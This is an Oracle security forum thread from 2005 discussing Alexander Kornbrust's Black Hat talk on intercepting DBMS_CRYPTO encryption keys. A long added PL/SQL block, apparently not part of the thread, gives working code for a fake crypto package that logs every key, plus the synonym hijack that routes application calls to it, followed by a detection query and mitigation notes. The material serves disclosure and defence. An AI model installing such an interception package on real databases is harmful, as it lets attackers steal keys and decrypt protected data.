Pete Finnigan's Oracle Security Forum

Alexander Kornbrust - Black Hat 2005 Presentation
Pete Finnigan
PeteFinnigan.com Administrator
Oracle Security is easier if you design for it
Posts: 309
Alexander Kornbrust - Black Hat 2005 Presentation
« on: Jul 27th, 2005, 7:51am »

What do you think about the latest info coming from Alex Kornbrust? It seems that there is no safe way to keep the data inside the database secured. Is there someone who attended this Black Hat presentation and who could write more details about Alex's findings in the forum?
URL from the news:
Oracle's encryption not secure, researcher says
The best encryption that DBMS_OBFUSCATION_TOOLKIT offers is 192-bit encryption using the Triple DES (3DES) algorithm in Oracle9i. I don't know how this has changed in 10g, but it seems that it doesn't matter, because anyway everyone who has a DBA account can decrypt the data. Is Transparent Data Encryption (coming with 10g) the only preferable way to keep the data secure, especially when there is a requirement coming from "security company standards"? For example, I know that for all companies that are working with Visa there is a requirement for at least a 256-bit or 512-bit (I am not sure) encryption key that they must use.
I just want to initiate some discussion about this subject: "How to keep our data secured within an Oracle database by using encryption".

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #1 on: Jul 27th, 2005, 2:33pm »

Hi Rado,
 
Thanks for your post about Alex's talk at Black Hat in Las Vegas. I have seen the text for his talk and was also aware of the news article you mention, but I don't think I can talk about specific details here yet, as I don't know if it has been given yet or whether the talk notes will be made public. I am reasonably sure Alex will publish them on his own site, Red Database Security, when he gets back.
 
That said, we can still discuss the general issue. I want to make two points really for now. The first is that the underlying problem with Oracle's DBMS_OBFUSCATION_TOOLKIT and DBMS_CRYPTO packages is not the algorithms themselves but the issue of key management. This is an issue to which Alex alludes in his talk. There are other issues as well.
 
The second issue is that at present TDE in 10gR2 doesn't on the surface look any more secure than the previous methods employed by Oracle. A number of bugs have already been found in TDE that allow the keys to become known easily.
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #2 on: Jul 27th, 2005, 3:24pm »

Hi Pete,
 
Thank you for your reply. Oracle is making many efforts to improve database security, but for now there are so many bugs and findings that are discovered very frequently. The latest thing, a "patch for the security patch", doesn't sound good.
 
I support the idea of opening this kind of forum, related mainly to Oracle security, and I hope that it will become very popular.
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #3 on: Jul 27th, 2005, 4:42pm »

Hi Rado,
 
Thanks for your reply. Yes, you are right, at the moment there are a lot of issues with bugs, patches that need to be patched, silent fixes, advisories released for unfixed bugs and of course the fact that a lot of bugs are still not fixed (those reported on sites such as Red Database Security and Argeniss). But we should not forget that Oracle have made some great strides forward with new functionality (TDE, OS audit as XML, FGA and RLS...) in recent years, and they have also improved their patch process a bit, at least on the documentation side. There needs to be work done on getting fixes out quicker and also on their recent problems of patches for patches, quality and testing. But it is better than the random security advisories we had before, which no one knew when to expect and which included much less detail.
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #4 on: Jul 29th, 2005, 7:41am »

Hi All,
 
For everyone who is interested, here is the link to the previously mentioned presentation:
http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Kornbrust/BH_US _05-Kornbrust.pdf
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #5 on: Jul 29th, 2005, 3:21pm »

Hi Rado,
 
Have you managed to open it? I tried to view it in IE and also downloaded it but neither option worked. I have emailed blackhat to ask if it is a problem their end.
 
cheers
 
Pete
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #6 on: Jul 29th, 2005, 3:26pm »

Plus, I forgot to mention Esteban Martínez Fayó's presentation, which is available here, and Cesar Cerrudo's, which is available here. At the moment I cannot read theirs either, sadly. I will get a newer version of Acrobat and see if that works. As far as I know Alex, Esteban, Cesar and David Litchfield were the only ones to talk about Oracle.
 
cheers
 
Pete
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #7 on: Jul 29th, 2005, 3:40pm »

Hi Pete,
 
I sent them as three attached PDF files to your official email.
 
Best regards
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #8 on: Aug 4th, 2005, 2:59pm »

Hello,
 
An updated version of the presentation is available on my website:
 
Cheers
 
 Alexander Kornbrust
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #9 on: Aug 4th, 2005, 3:42pm »

Thanks Alex,
 
welcome to the forum!
 
cheers
 
Pete
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #10 on: Aug 4th, 2005, 6:34pm »

Hello,
 
Here is a short summary of my presentation. Interception of encryption keys is easy if a hacker (or DBA) installs a special package which intercepts all parameters and passes them on to the original package. DBA permission is not always required.
 
1. Install a dbms_crypto package with the same specification as the original dbms_crypto.
 
Sample: see dbms_crypto_fake.sql
 
2. Create a private synonym or modify the public synonym.
 
That's all. You find all encryption keys in the log file of your web server.
 
It is possible to mitigate the risk (a little bit) by
 
  * using fully qualified names (e.g. SYS.DBMS_CRYPTO)
 
Regards
 
 Alex
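The two steps in Alex's summary above, followed by the query a DBA would run to find them, as an added PL/SQL example. It is not the dbms_crypto_fake.sql from the presentation and not code from any post in this thread. Assumptions, all made up for the demo: the shadow package is created in a schema called ATTACKER, the victim application schema is APP_OWNER, and the captured keys are written to a local table instead of being shipped to a web server. Only the constants and the two RAW entry points that a typical application calls are mirrored; the real package has many more overloads, and any one the victim code references but the fake omits will simply fail to compile, which is why the post insists on "the same specification".

```sql
-- Added example (not from the presentation). ATTACKER and APP_OWNER are
-- assumed schema names; KEY_INTERCEPT_LOG stands in for the web server log.

-- Step 1: a package with the same (here: partial) specification as
-- SYS.DBMS_CRYPTO, created in a non-SYS schema. Oracle allows the name clash.
CREATE TABLE attacker.key_intercept_log (
  captured_at  TIMESTAMP DEFAULT SYSTIMESTAMP,
  session_user VARCHAR2(128),
  key_hex      VARCHAR2(4000)
);

CREATE OR REPLACE PACKAGE attacker.dbms_crypto AS
  -- Constants are re-exported from the real package so callers that build
  -- the "typ" argument from DBMS_CRYPTO.ENCRYPT_AES256 + ... still compile.
  ENCRYPT_AES128 CONSTANT PLS_INTEGER := SYS.DBMS_CRYPTO.ENCRYPT_AES128;
  ENCRYPT_AES256 CONSTANT PLS_INTEGER := SYS.DBMS_CRYPTO.ENCRYPT_AES256;
  CHAIN_CBC      CONSTANT PLS_INTEGER := SYS.DBMS_CRYPTO.CHAIN_CBC;
  PAD_PKCS5      CONSTANT PLS_INTEGER := SYS.DBMS_CRYPTO.PAD_PKCS5;

  FUNCTION encrypt(src IN RAW, typ IN PLS_INTEGER, key IN RAW,
                   iv IN RAW DEFAULT NULL) RETURN RAW;
  FUNCTION decrypt(src IN RAW, typ IN PLS_INTEGER, key IN RAW,
                   iv IN RAW DEFAULT NULL) RETURN RAW;
END dbms_crypto;
/

CREATE OR REPLACE PACKAGE BODY attacker.dbms_crypto AS
  -- Record the key, then hand the call to the real package so the caller
  -- gets correct ciphertext and notices nothing.
  PROCEDURE log_key(p_key IN RAW) IS
    PRAGMA AUTONOMOUS_TRANSACTION;  -- the capture survives a caller rollback
  BEGIN
    INSERT INTO attacker.key_intercept_log (session_user, key_hex)
    VALUES (SYS_CONTEXT('USERENV', 'SESSION_USER'), RAWTOHEX(p_key));
    COMMIT;
  END log_key;

  FUNCTION encrypt(src IN RAW, typ IN PLS_INTEGER, key IN RAW,
                   iv IN RAW DEFAULT NULL) RETURN RAW IS
  BEGIN
    log_key(key);
    RETURN SYS.DBMS_CRYPTO.ENCRYPT(src, typ, key, iv);
  END encrypt;

  FUNCTION decrypt(src IN RAW, typ IN PLS_INTEGER, key IN RAW,
                   iv IN RAW DEFAULT NULL) RETURN RAW IS
  BEGIN
    log_key(key);
    RETURN SYS.DBMS_CRYPTO.DECRYPT(src, typ, key, iv);
  END decrypt;
END dbms_crypto;
/
GRANT EXECUTE ON attacker.dbms_crypto TO app_owner;

-- Step 2: make the victim's unqualified "DBMS_CRYPTO" resolve to the fake.
-- Resolution order is: object in the caller's own schema, then a private
-- synonym, then the public synonym. A private synonym in APP_OWNER needs
-- CREATE ANY SYNONYM (or a session as APP_OWNER); swapping the public one
-- needs CREATE PUBLIC SYNONYM and DROP PUBLIC SYNONYM. Neither is the DBA
-- role. Dependent code is invalidated and recompiles against the new target
-- on its next call, without any error being raised.
CREATE SYNONYM app_owner.dbms_crypto FOR attacker.dbms_crypto;
-- CREATE OR REPLACE PUBLIC SYNONYM dbms_crypto FOR attacker.dbms_crypto;

-- Victim code run as APP_OWNER, unchanged, now leaks its key on every call.
-- The key and plaintext below are constructed demo values.
DECLARE
  l_key RAW(32) := UTL_RAW.CAST_TO_RAW('0123456789abcdef0123456789abcdef');
  l_ct  RAW(2000);
BEGIN
  l_ct := DBMS_CRYPTO.ENCRYPT(
            src => UTL_RAW.CAST_TO_RAW('4111111111111111'),
            typ => DBMS_CRYPTO.ENCRYPT_AES256 + DBMS_CRYPTO.CHAIN_CBC
                   + DBMS_CRYPTO.PAD_PKCS5,
            key => l_key);
END;
/
-- SELECT key_hex FROM attacker.key_intercept_log;  -- hex of l_key

-- Detection, run as a DBA: anything named like the SYS crypto packages that
-- lives outside SYS, plus any synonym of those names not pointing at SYS.
SELECT owner, object_name, object_type, last_ddl_time
  FROM dba_objects
 WHERE object_name IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT')
   AND owner <> 'SYS'
   AND object_type <> 'SYNONYM'
UNION ALL
SELECT owner, synonym_name,
       'SYNONYM -> ' || table_owner || '.' || table_name, CAST(NULL AS DATE)
  FROM dba_synonyms
 WHERE synonym_name IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT')
   AND table_owner <> 'SYS';
```

Writing SYS.DBMS_CRYPTO in the application, as the post suggests, defeats the synonym step because the qualified name never consults a synonym. It does nothing against a DBA who can replace SYS.DBMS_CRYPTO itself, trace the session, or read the key from wherever the application keeps it, which is Pete's key-management point in Reply #1. The detection query belongs in a periodic check together with an alert on DDL against these names.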
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #11 on: Aug 5th, 2005, 8:35pm »

Alex,
 
Your presentation materials are awesome.  I really enjoyed reading them, especially the nonsense quotes in the beginning of the presentation.
 
Thank you,
 
-Josh
Re: Alexander Kornbrust - Black Hat 2005 Presentation
« Reply #12 on: Aug 6th, 2005, 2:59pm »

Josh,
 
Most people believe that the product documentation or specialised books are telling the truth.
 
DBMS_CRYPTO/DBMS_OBFUSCATION_TOOLKIT is nearly useless in the current architecture. This also has side effects on the Oracle product stack.
 
Oracle itself is not able to store the passwords/data in a secure manner. That is probably the reason why Oracle itself uses dbms_crypto/dbms_otk very rarely. I know only 4 components (UltraSearch, MGW, DM and Grid Control) in the database which are using dbms_crypto/otk.
 
Regards
 
 Alex